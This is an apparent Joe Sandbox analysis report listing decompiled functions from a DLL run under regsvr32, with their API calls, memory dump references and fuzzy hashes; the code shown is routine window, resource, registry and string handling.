GetRgnBox.GDI32(?,?), ref: 1000C44A
IntersectRect.USER32 ref: 1000C45F
EqualRect.USER32 ref: 1000C46D

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Rect$EqualH_prologIntersect
String ID:
API String ID: 2227276553-0
Opcode ID: f49d3fc44bbea1a9a3703b3f7f4095f6500e4823f07a0e2dd16f70af3848267f
Instruction ID: 893439b2a63fa3b6d9f12e039fea2b97180e1d04971d70f679ed86cc273fc7ba
Opcode Fuzzy Hash: f49d3fc44bbea1a9a3703b3f7f4095f6500e4823f07a0e2dd16f70af3848267f
Instruction Fuzzy Hash: 6221F97290121DEFDB11DF94D984DEEBBB9FF08291B51456AF911E3210D731AE01CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1001EFD9 Relevance: 6.1, APIs: 4, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E1001EFD9(void* __ecx) {
				void* _v8;
				signed short _t23;
				void* _t30;
				struct HINSTANCE__* _t32;
				signed short _t34;
				void* _t36;
				signed short* _t39;
				signed short _t41;

				_push(__ecx);
				_t36 = __ecx;
				_t39 =  *(__ecx + 0x5c);
				_v8 =  *((intOrPtr*)(__ecx + 0x58));
				if( *((intOrPtr*)(__ecx + 0x54)) != 0) {
					_t32 =  *(E10027747() + 0xc);
					_v8 = LoadResource(_t32, FindResourceA(_t32,  *(_t36 + 0x54), 5));
				}
				if(_v8 != 0) {
					_t39 = LockResource(_v8);
				}
				_t30 = 1;
				if(_t39 != 0) {
					_t34 =  *_t39;
					if(_t39[1] != 0xffff) {
						_t23 = _t39[5];
						_t41 = _t39[6];
					} else {
						_t34 = _t39[6];
						_t23 = _t39[9];
						_t41 = _t39[0xa];
					}
					if((_t34 & 0x00001801) != 0 || _t23 != 0 || _t41 != 0) {
						_t30 = 0;
					}
				}
				if( *(_t36 + 0x54) != 0) {
					FreeResource(_v8);
				}
				return _t30;
			}

0x1001efdc
0x1001efe0
0x1001efe9
0x1001efec
0x1001efef
0x1001eff6
0x1001f00d
0x1001f00d
0x1001f014
0x1001f01f
0x1001f01f
0x1001f023
0x1001f026
0x1001f02e
0x1001f030
0x1001f03f
0x1001f043
0x1001f032
0x1001f032
0x1001f035
0x1001f039
0x1001f039
0x1001f04c
0x1001f058
0x1001f058
0x1001f04c
0x1001f05e
0x1001f063
0x1001f063
0x1001f06f

APIs

FindResourceA.KERNEL32(?,00000000,00000005), ref: 1001EFFF
LoadResource.KERNEL32(?,00000000), ref: 1001F007
LockResource.KERNEL32(00000000), ref: 1001F019
FreeResource.KERNEL32(00000000), ref: 1001F063

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 79a385958bd1abbb51bdfa13ab21794ec82e837399486797c07fe0982f095651
Instruction ID: 1cbb828e628f50f529575e252a8895c21c2b2b58810a8f6a494f9e13ac8a3601
Opcode Fuzzy Hash: 79a385958bd1abbb51bdfa13ab21794ec82e837399486797c07fe0982f095651
Instruction Fuzzy Hash: 19110639500751EFD721DF64C984AAAB3F4FF08795F10441CE8425B652D770ED89CB60

Uniqueness

Uniqueness Score: -1.00%

Function 10023732 Relevance: 6.1, APIs: 4, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E10023732(void* __ecx, void* __esi) {
				void* _v8;
				void* _t11;
				void* _t23;
				intOrPtr* _t30;
				void* _t32;

				_t32 = __esi;
				_push(__ecx);
				_t23 = __ecx;
				if(E1001F51F(0x10) == 0) {
					_t30 = 0;
				} else {
					_t30 = E100236CC(_t9, 0xffffffff);
				}
				_push(_t32);
				_t11 = GetCurrentProcess();
				if(DuplicateHandle(GetCurrentProcess(),  *(_t23 + 4), _t11,  &_v8, 0, 0, 2) == 0) {
					if(_t30 != 0) {
						 *((intOrPtr*)( *_t30 + 4))(1);
					}
					E100245CA(GetLastError(),  *((intOrPtr*)(_t23 + 0xc)));
				}
				 *((intOrPtr*)(_t30 + 4)) = _v8;
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t23 + 8));
				return _t30;
			}

0x10023732
0x10023735
0x1002373a
0x10023744
0x10023753
0x10023746
0x1002374f
0x1002374f
0x10023755
0x10023766
0x10023778
0x1002377c
0x10023784
0x10023784
0x10023791
0x10023791
0x10023799
0x1002379f
0x100237a7

APIs

GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 10023766
GetCurrentProcess.KERNEL32(?,00000000), ref: 1002376C
DuplicateHandle.KERNEL32(00000000), ref: 1002376F
GetLastError.KERNEL32(?), ref: 1002378A

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CurrentProcess$DuplicateErrorHandleLast
String ID:
API String ID: 3907606552-0
Opcode ID: 8f8e11b02ad6b27f87fa78a2d95db45119702c23b49027810cea871847f9838c
Instruction ID: 6cc17aeaeb9afa8b9fba9f6a3535c94d6366e8751b0624092107e80d48062149
Opcode Fuzzy Hash: 8f8e11b02ad6b27f87fa78a2d95db45119702c23b49027810cea871847f9838c
Instruction Fuzzy Hash: 2701D4B5704200BBEF10DBB5DC89F1A7BA9EF84360F648515FA05CB291DB71EC019760

Uniqueness

Uniqueness Score: -1.00%

Function 10021E91 Relevance: 6.1, APIs: 4, Instructions: 52
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10021E91(intOrPtr* __ecx) {
				struct HWND__* _t14;
				intOrPtr* _t23;

				_t23 = __ecx;
				if( *((intOrPtr*)( *__ecx + 0x120))() != 0) {
					 *((intOrPtr*)( *__ecx + 0x16c))();
				}
				SendMessageA( *(_t23 + 0x1c), 0x1f, 0, 0);
				E10021328( *(_t23 + 0x1c), 0x1f, 0, 0, 1, 1);
				SendMessageA( *(E1002174E(_t23) + 0x1c), 0x1f, 0, 0);
				E10021328( *((intOrPtr*)(_t11 + 0x1c)), 0x1f, 0, 0, 1, 1);
				_t14 = GetCapture();
				if(_t14 != 0) {
					return SendMessageA(_t14, 0x1f, 0, 0);
				}
				return _t14;
			}

0x10021e93
0x10021ea0
0x10021ea6
0x10021ea6
0x10021ebb
0x10021ec8
0x10021edd
0x10021eea
0x10021eef
0x10021ef7
0x00000000
0x10021efe
0x10021f03

APIs

SendMessageA.USER32 ref: 10021EBB
SendMessageA.USER32 ref: 10021EDD
GetCapture.USER32 ref: 10021EEF
SendMessageA.USER32 ref: 10021EFE

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: MessageSend$Capture
String ID:
API String ID: 1665607226-0
Opcode ID: 7745c5cf18dbb8e097cb719fce5a3a3cecae1f2ec1f211fb07572704fc919427
Instruction ID: 94b43e5626eecd317cc7524982896972bfb8adcbcc776780cf9d1af5025c7500
Opcode Fuzzy Hash: 7745c5cf18dbb8e097cb719fce5a3a3cecae1f2ec1f211fb07572704fc919427
Instruction Fuzzy Hash: 8A016DB434030C7FFB30AB24ACC9FBB76AEEF88785F510474F641AA5D2CAA15C015A60

Uniqueness

Uniqueness Score: -1.00%

Function 10021328 Relevance: 6.0, APIs: 4, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E10021328(struct HWND__* _a4, int _a8, int _a12, long _a16, intOrPtr _a20, intOrPtr _a24) {
				void* __ebp;
				struct HWND__* _t16;
				void* _t20;
				struct HWND__* _t23;

				_t16 = GetTopWindow(_a4);
				while(1) {
					_t23 = _t16;
					if(_t23 == 0) {
						break;
					}
					if(_a24 == 0) {
						SendMessageA(_t23, _a8, _a12, _a16);
					} else {
						_push(_t23);
						_t20 = E10020AB3();
						if(_t20 != 0) {
							_push(_a16);
							_push(_a12);
							_push(_a8);
							_push( *((intOrPtr*)(_t20 + 0x1c)));
							_push(_t20);
							E10021051();
						}
					}
					if(_a20 != 0 && GetTopWindow(_t23) != 0) {
						E10021328(_t23, _a8, _a12, _a16, _a20, _a24);
					}
					_t16 = GetWindow(_t23, 2);
				}
				return _t16;
			}

0x10021336
0x10021399
0x10021399
0x1002139d
0x00000000
0x00000000
0x1002133e
0x10021368
0x10021340
0x10021340
0x10021341
0x10021348
0x1002134a
0x1002134d
0x10021350
0x10021353
0x10021356
0x10021357
0x10021357
0x10021348
0x10021372
0x1002138b
0x1002138b
0x10021393
0x10021393
0x100213a2

APIs

GetTopWindow.USER32(?), ref: 10021336
GetTopWindow.USER32(00000000), ref: 10021375
GetWindow.USER32(00000000,00000002), ref: 10021393

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: 4c2aab846cc6292fe81b3f77265c7904519cb297191cd0370932cf9f4aceac36
Instruction ID: 66ff45678a35050836993a23ce6722b5d198dd4aa02555eaab83d79fc53be760
Opcode Fuzzy Hash: 4c2aab846cc6292fe81b3f77265c7904519cb297191cd0370932cf9f4aceac36
Instruction Fuzzy Hash: 6901293A00061ABBCF02DF90AC04EDE3BABFF18390F914010FA0450421C776CA62EBA5

Uniqueness

Uniqueness Score: -1.00%

Function 10026066 Relevance: 6.0, APIs: 4, Instructions: 48
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10026066(void* __ecx, void* __edi, void* __esi, CHAR* _a4, CHAR* _a8, char _a12) {
				intOrPtr _v8;
				char _v24;
				intOrPtr _t15;
				long _t22;
				void* _t31;
				void* _t32;

				_t15 =  *0x100371f4; // 0x39cf7dc9
				_t31 = __ecx;
				_v8 = _t15;
				if( *((intOrPtr*)(__ecx + 0x50)) == 0) {
					wsprintfA( &_v24, "%d", _a12);
					_t19 = WritePrivateProfileStringA(_a4, _a8,  &_v24,  *(_t31 + 0x64));
				} else {
					_t32 = E1002816B(__ecx, _a4);
					if(_t32 != 0) {
						_t22 = RegSetValueExA(_t32, _a8, 0, 4,  &_a12, 4);
						RegCloseKey(_t32);
						_t19 = 0 | _t22 == 0x00000000;
					}
				}
				return E10011A49(_t19, _v8);
			}

0x1002606c
0x10026072
0x10026078
0x1002607b
0x100260bf
0x100260d5
0x1002607d
0x10026085
0x10026089
0x1002609a
0x100260a3
0x100260ad
0x100260b0
0x10026089
0x100260e5

APIs

RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,?), ref: 1002609A
RegCloseKey.ADVAPI32(00000000,?,?), ref: 100260A3
wsprintfA.USER32 ref: 100260BF
WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 100260D5

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ClosePrivateProfileStringValueWritewsprintf
String ID:
API String ID: 1902064621-0
Opcode ID: 1030caaca5fed2ec1b505a2b2ed5fcbae2776b8ec4336b20fd1a7f330d113955
Instruction ID: dbd3dcef2f50a9cfde67fe85f818d911aed70fdcf0d319bd2de0a1eb1e9519d6
Opcode Fuzzy Hash: 1030caaca5fed2ec1b505a2b2ed5fcbae2776b8ec4336b20fd1a7f330d113955
Instruction Fuzzy Hash: A801713240062AFBDB21DFA4DC89E9F3BB8FF08754F504025FA05AA150EB70DA12DB91

Uniqueness

Uniqueness Score: -1.00%

Function 10020D7C Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E10020D7C(struct HWND__* _a4, int _a8, intOrPtr _a12) {
				void* __ebp;
				struct HWND__* _t10;
				struct HWND__* _t14;
				struct HWND__* _t15;
				void* _t16;

				_t14 = GetDlgItem(_a4, _a8);
				if(_t14 == 0) {
					L6:
					_t10 = GetTopWindow(_a4);
					while(1) {
						_t15 = _t10;
						if(_t15 == 0) {
							goto L10;
						}
						_t10 = E10020D7C(_t15, _a8, _a12);
						if(_t10 == 0) {
							_t10 = GetWindow(_t15, 2);
							continue;
						}
						goto L10;
					}
				} else {
					if(GetTopWindow(_t14) == 0) {
						L3:
						_push(_t14);
						if(_a12 == 0) {
							return E10020A8C(_t16);
						}
						_t10 = E10020AB3();
						if(_t10 == 0) {
							goto L6;
						}
					} else {
						_t10 = E10020D7C(_t14, _a8, _a12);
						if(_t10 == 0) {
							goto L3;
						}
					}
				}
				L10:
				return _t10;
			}

0x10020d93
0x10020d97
0x10020dc7
0x10020dca
0x10020de7
0x10020de7
0x10020deb
0x00000000
0x00000000
0x10020dd5
0x10020ddc
0x10020de1
0x00000000
0x10020de1
0x00000000
0x10020ddc
0x10020d99
0x10020d9e
0x10020db0
0x10020db4
0x10020db5
0x00000000
0x10020db7
0x10020dbe
0x10020dc5
0x00000000
0x00000000
0x10020da0
0x10020da7
0x10020dae
0x00000000
0x00000000
0x10020dae
0x10020d9e
0x10020df0
0x10020df0

APIs

GetDlgItem.USER32 ref: 10020D87
GetTopWindow.USER32(00000000), ref: 10020D9A

Part of subcall function 10020D7C: GetWindow.USER32(00000000,00000002), ref: 10020DE1

GetTopWindow.USER32(?), ref: 10020DCA

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: 21f74a113946cd527e76639aa47c53ad8dc2fd7a2a48c2c54bdf829808e45900
Instruction ID: 9d45a5eaf833e8342ea8658b8fc51275725192d96523c4fe16453540544cdebd
Opcode Fuzzy Hash: 21f74a113946cd527e76639aa47c53ad8dc2fd7a2a48c2c54bdf829808e45900
Instruction Fuzzy Hash: 5C014F36103B66A7DB12EFA1EC00F8E3A9AEF05294FD64011FD0055123DB31E9119A91

Uniqueness

Uniqueness Score: -1.00%

Function 1002883A Relevance: 6.0, APIs: 4, Instructions: 45
memoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E1002883A(short* _a4) {
				char* _v0;
				int _v8;
				char* _v16;
				int _t6;
				char* _t7;
				short* _t11;
				void* _t12;
				void* _t16;
				int _t17;

				_t11 = _a4;
				if(_t11 != 0) {
					__imp__#7(_t11, _t12, _t16);
					_t17 = _t6;
					_t7 = WideCharToMultiByte(0, 0, _t11, _t17, 0, 0, 0, 0);
					_v0 = _t7;
					__imp__#150(0, _t7);
					_v16 = _t7;
					WideCharToMultiByte(0, 0, _t11, _t17, _t7, _v8, 0, 0);
					return _v16;
				}
				return 0;
			}

0x1002883c
0x10028845
0x1002884e
0x1002885e
0x10028864
0x10028868
0x1002886c
0x10028878
0x10028881
0x00000000
0x10028888
0x00000000

APIs

SysStringLen.OLEAUT32(?), ref: 1002884E
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,100297B4,00000000), ref: 10028864
SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 1002886C
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,00000000,?,?,?,?,100297B4,00000000), ref: 10028881

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Byte$CharMultiStringWide$Alloc
String ID:
API String ID: 3384502665-0
Opcode ID: 3c7747a0fdd51894c554270352cc45aff2ebdffdadcce74c0e3214a9369f9261
Instruction ID: d1c89f159441746b2e07e270c4f99bc264b0d46c7cbe9379866ddbcf631a71b3
Opcode Fuzzy Hash: 3c7747a0fdd51894c554270352cc45aff2ebdffdadcce74c0e3214a9369f9261
Instruction Fuzzy Hash: 88F03A76107639BFA2209B669C8CCAFBF9CEE8B2A5B11452AF54982110C6315901CBF1

Uniqueness

Uniqueness Score: -1.00%

Function 1000C392 Relevance: 6.0, APIs: 4, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E1000C392(intOrPtr _a4, RECT* _a8, int _a12) {
				struct tagRECT _v20;
				intOrPtr _t28;

				_t28 = _a4;
				if(_a8 != 0) {
					IntersectRect( &_v20, _a8, _t28 - 0x9c);
					EqualRect( &_v20, _a8);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if(IsRectEmpty( &_v20) == 0) {
					InvalidateRect( *( *((intOrPtr*)( *((intOrPtr*)(_t28 - 0xac)) + 0x1c)) + 0x1c),  &_v20, _a12);
				}
				return 0;
			}

0x1000c39d
0x1000c3a0
0x1000c3c3
0x1000c3d0
0x1000c3a2
0x1000c3ad
0x1000c3ae
0x1000c3af
0x1000c3b0
0x1000c3b2
0x1000c3e2
0x1000c3f7
0x1000c3f7
0x1000c401

APIs

IntersectRect.USER32 ref: 1000C3C3
EqualRect.USER32 ref: 1000C3D0
IsRectEmpty.USER32 ref: 1000C3DA
InvalidateRect.USER32(?,?,?), ref: 1000C3F7

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Rect$EmptyEqualIntersectInvalidate
String ID:
API String ID: 3354205298-0
Opcode ID: f0ed8b48114fb23be77498269367ff93e0a3b894fe797463903eab2dbd989ea5
Instruction ID: 9159c987aa2d5a5aeeee2be08ce2a62d7413ba657a27a741624aa30df7b12500
Opcode Fuzzy Hash: f0ed8b48114fb23be77498269367ff93e0a3b894fe797463903eab2dbd989ea5
Instruction Fuzzy Hash: CC010C3191021EABEF01DFA4CC88EAA77BDFF08354F008465F91496115D271E6068B60

Uniqueness

Uniqueness Score: -1.00%

Function 100226EB Relevance: 6.0, APIs: 4, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100226EB(void* __ecx, CHAR* _a4) {
				void* __edi;
				struct HRSRC__* _t8;
				void* _t9;
				void* _t11;
				void* _t14;
				void* _t15;
				struct HINSTANCE__* _t16;
				void* _t17;

				_t14 = 0;
				_t11 = 0;
				_t17 = __ecx;
				if(_a4 == 0) {
					L4:
					_t15 = E10021850(_t17, _t14, _t11);
					if(_t11 != 0 && _t14 != 0) {
						FreeResource(_t14);
					}
					return _t15;
				}
				_t16 =  *(E10027747() + 0xc);
				_t8 = FindResourceA(_t16, _a4, 0xf0);
				if(_t8 == 0) {
					goto L4;
				}
				_t9 = LoadResource(_t16, _t8);
				_t14 = _t9;
				if(_t14 != 0) {
					_t11 = LockResource(_t14);
					goto L4;
				}
				return _t9;
			}

0x100226ef
0x100226f1
0x100226f7
0x100226f9
0x1002272e
0x10022738
0x1002273a
0x10022741
0x10022741
0x00000000
0x10022747
0x10022700
0x1002270d
0x10022715
0x00000000
0x00000000
0x10022719
0x1002271f
0x10022723
0x1002272c
0x00000000
0x1002272c
0x1002274d

APIs

FindResourceA.KERNEL32(?,?,000000F0), ref: 1002270D
LoadResource.KERNEL32(?,00000000,?,?,?,?,1001EF92,?,?,1000658A), ref: 10022719
LockResource.KERNEL32(00000000,?,?,?,?,1001EF92,?,?,1000658A), ref: 10022726
FreeResource.KERNEL32(00000000,?,?,?,?,1001EF92,?,?,1000658A), ref: 10022741

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 3a29dd8cbd6d72f89d273518e8fd5abda38e5c7998f2d129a3dcfe3df708c639
Instruction ID: 0b52cf9b356d3f5d4ba4559ec291a070f78181d08af1efc45dcf1bf1b7ff762e
Opcode Fuzzy Hash: 3a29dd8cbd6d72f89d273518e8fd5abda38e5c7998f2d129a3dcfe3df708c639
Instruction Fuzzy Hash: 2CF0963A209611BBD3419BA55CC8A7FB6BDEF856E1B510039FD08D2211DE309C06C6B1

Uniqueness

Uniqueness Score: -1.00%

Function 1001E9BA Relevance: 6.0, APIs: 4, Instructions: 41
windowCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E1001E9BA(void* __ecx, void* __edi, void* __ebp, signed int _a4) {
				intOrPtr _t14;
				int _t15;
				intOrPtr _t28;
				void* _t30;

				_t30 = __ecx;
				_t14 =  *((intOrPtr*)(__ecx + 0xc));
				if(_t14 == 0) {
					if(_a4 == 0) {
						_t28 =  *((intOrPtr*)(__ecx + 0x14));
						if(GetFocus() ==  *(_t28 + 0x1c)) {
							SendMessageA( *(E10020A8C(__ebp, GetParent( *(_t28 + 0x1c))) + 0x1c), 0x28, 0, 0);
						}
					}
					_t15 = E10022B0F( *((intOrPtr*)(_t30 + 0x14)), _a4);
					L8:
					 *((intOrPtr*)(_t30 + 0x18)) = 1;
					return _t15;
				}
				if( *((intOrPtr*)(__ecx + 0x10)) == 0) {
					asm("sbb ecx, ecx");
					_t15 = EnableMenuItem( *(_t14 + 4),  *(__ecx + 8), ( ~_a4 & 0xfffffffd) + 0x00000003 | 0x00000400);
					goto L8;
				}
				return _t14;
			}

0x1001e9bb
0x1001e9bd
0x1001e9c2
0x1001e9f2
0x1001e9f5
0x1001ea01
0x1001ea1b
0x1001ea1b
0x1001ea21
0x1001ea29
0x1001ea2e
0x1001ea2e
0x00000000
0x1001ea2e
0x1001e9c8
0x1001e9d0
0x1001e9e5
0x00000000
0x1001e9e5
0x1001ea36

APIs

EnableMenuItem.USER32 ref: 1001E9E5
GetFocus.USER32 ref: 1001E9F8
GetParent.USER32(?), ref: 1001EA06
SendMessageA.USER32 ref: 1001EA1B

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: EnableFocusItemMenuMessageParentSend
String ID:
API String ID: 2297321873-0
Opcode ID: f5826bd03a1017b66a7141d6917d7c0c41881ba600cb9822856f305d40dfd7da
Instruction ID: a68035344e1a35b3cc5600f124cb7325eea486401607c6a04fb7d247c7f80c17
Opcode Fuzzy Hash: f5826bd03a1017b66a7141d6917d7c0c41881ba600cb9822856f305d40dfd7da
Instruction Fuzzy Hash: C7015630510A02ABE729DF24DC8AB5ABBF5FF40721F618A19F242965E1CB70FC85CA51

Uniqueness

Uniqueness Score: -1.00%

Function 10023080 Relevance: 6.0, APIs: 4, Instructions: 40
stringCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E10023080(void* __ecx) {
				int _t26;
				int _t28;
				void* _t41;

				E10011A8C(E1002A99F, _t41);
				_push(__ecx);
				if( *((intOrPtr*)(__ecx + 0x4c)) != 0) {
					 *(_t41 - 0x10) =  *((intOrPtr*)( *((intOrPtr*)(E1002320B())) + 0xc))() + 0x10;
					 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
					_push(_t41 - 0x10);
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x4c)))) + 0x8c))();
					lstrcpynA( *(_t41 + 8),  *(_t41 - 0x10),  *(_t41 + 0xc));
					_t26 = lstrlenA( *(_t41 + 8));
					E10002EB0( &(( *(_t41 - 0x10))[0xfffffffffffffff0]), _t41 - 0x10);
					_t28 = _t26;
				} else {
					_t28 = GetWindowTextA( *(__ecx + 0x1c),  *(_t41 + 8),  *(_t41 + 0xc));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t41 - 0xc));
				return _t28;
			}

0x10023085
0x1002308a
0x10023092
0x100230b4
0x100230bc
0x100230c3
0x100230c4
0x100230d3
0x100230dc
0x100230ea
0x100230ef
0x10023094
0x1002309d
0x1002309d
0x100230f5
0x100230fd

APIs

__EH_prolog.LIBCMT ref: 10023085
GetWindowTextA.USER32 ref: 1002309D
lstrcpynA.KERNEL32(?,?,?), ref: 100230D3
lstrlenA.KERNEL32(?), ref: 100230DC

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

